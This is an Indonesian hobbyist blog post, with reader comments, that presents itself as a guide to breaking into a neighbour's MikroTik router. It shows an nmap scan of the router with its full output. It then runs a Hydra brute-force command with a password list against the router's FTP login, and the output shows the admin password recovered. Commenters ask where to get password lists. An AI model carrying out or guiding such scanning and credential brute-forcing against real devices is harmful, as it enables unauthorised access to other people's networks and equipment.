Sedikit curhat aja nih ane di awal bahasan.. :)
dari 1 bulan terakhir ini penulis masih belum bisa secara rutin update, dan akhirnya pada kesempatan di pagi hari ini penulis bisa OL kembali dan update artikel yang ada di blog ini..
hehhehe
OKe langsung saja, sesuai dengan topik dan bahasan, penulis ingin men-share beberapa teknik yang biasa di gunakan para Hacker untuk menjebol dan mengutak-atik beberapa konfigurasi dari Mikrotik tetangga... hahahah
Ada beberapa Tool dan perkakas yang perlu ane siapin dolo sebelum ke TKP..
1. Kopi Panas cap Kapal A*i
2. Rokok Inter 9 Batang [ Wajib Ini]
3. Nmap / Port Scanner
4. Hydra
5. List Password and Usernamed... hehehe
Woke cekibrot om bro...
Step By Stepnya kayak gini
1. Scan Pake Nmap IP Mikrotik nya
C:\H4ck\shadow007>nmap -A 192.168.1.15
Nmap scan report for 192.168.1.15
Host is up (0.00013s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp MikroTik router ftpd 3.20
22/tcp open ssh OpenSSH 2.3.0 mikrotik 2.9 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 1024 c6:5e:04:d3:12:db:1d:98:c9:17:e2:98:77:d4:39:ba (RSA1)
|_1024 76:68:bc:ee:e3:40:f5:6b:72:ea:44:55:df:86:06:ec (DSA)
23/tcp open telnet Linux telnetd
80/tcp open http MikroTik router http config
|_html-title: mikrotik routeros > administration
2000/tcp open winbox MikroTik WinBox management console
8080/tcp open http-proxy Mikrotik http proxy
8291/tcp open unknown
MAC Address: 08:00:27:22:84:F1 (Cadmus Computer Systems)
Device type: media device
Running: Chumby embedded
OS details: Chumby Internet radio
Network Distance: 1 hop
Service Info: OS: Linux; Device: router
HOP RTT ADDRESS
1 0.13 ms 192.168.1.15
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.00 seconds
WAW.... Lumayan banyak juga yah Port yang terbuka di Mikrotik ini... hahahahaha
MantapZ...
Oke selanjutnya kita masuk ke Step yang ke 2
2. Hacked Login Page with Hydra [ Keminggriiss ] LoL
Disini penulis a.k.a Ane make tools buat BruteForce Login page Mikrotik menggunakan Hydra..
Hydra ada juga yang versi Win*OWs dan ada juga yang versi Linux..
D:\hydra>hydra -l admin -P Password_List.txt 192.168.1.15 ftp
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-11-07 14:39:20
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.15 login: admin password: jagoan
[STATUS] attack finished for 192.168.1.15 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-11-07 14:39:26
WAW.. Ciyus ? akhirnya password mikrotik sudah didapat.
#Catatan Cilik :
Username : admin
Password : Disini ane menggunakan List Password. >> Password_List.txt
OKe Sekian DOlo dan Terima Kasih... hehehehe.
5 comments:
download username dan passwordlistnya dimana gan?tanya mbah google gak nemu
bro .. klo ngasi tutorial jangan setengah" ..
di hydra sendiri ada jga yg versi linux ..
dan settingan ny jga ga sedikit
make protocol yg mana .. n hasil scanning ny port ny jga ada lebih dari satu n penjelasan ny gmna , SS nya jga ga ada -_-
copy paste
Waduh kentang ini brow..., Kotadi Indonesia dengan koneksi internet tercepat
ijin coba om, semoga masih bisa
nusa penida tour
nusa penida tours
Post a Comment